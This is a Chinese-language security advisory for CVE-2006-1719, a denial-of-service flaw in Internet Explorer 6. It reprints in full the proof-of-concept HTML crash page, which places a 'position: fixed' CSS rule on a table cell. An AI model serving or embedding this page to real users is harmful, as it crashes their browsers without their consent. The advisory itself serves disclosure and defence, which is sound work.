Microsoft Internet Explorer Position CSS拒绝服务漏洞
发布日期:2006-05-10
更新日期:2006-05-15
受影响系统:Microsoft Internet Explorer 6.0
描述:
BUGTRAQ ID:
17932
CVE(CAN) ID:
CVE-2006-1719
Windows Internet Explorer是微软公司推出的一款网页浏览器。
Internet Explorer 6存在拒绝服务漏洞,远程攻击者用包含特制滚动条CSS属性的恶意网页造成受害者浏览器崩溃。
<*来源:seven
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
# Internet Explorer <= 6.0.2900 SP2
#
# suffers from a DoS vulnerability in which a remote users
# Internet Explorer session can be crashed when hovering
# their cursor over a specially made table. The fault occurs
# when the "position" CSS attribute is set to a table.
# This results in an 'unhandled exception in iexplorer.exe(MSHTML.DLL)'
#
# $uid-seven
#
# shout outs to cijfer, ReZEN
-->
<html>
<head>
</style>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>IE-Crash - By seven</title>
<style type="text/css">
#header{
position: fixed;
height: 761px;
width: 1268;
}
</style>
</head>
<body>
<table border="2" cellpadding="0" cellspacing="0" width="797" height="343" align="center">
<tr>
<td id="header" valign="top">
</td>
<td valign="top">
</td>
</table>
# milw0rm.com [2006-05-10]
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp浏览次数:1746
严重程度:0(网友投票)
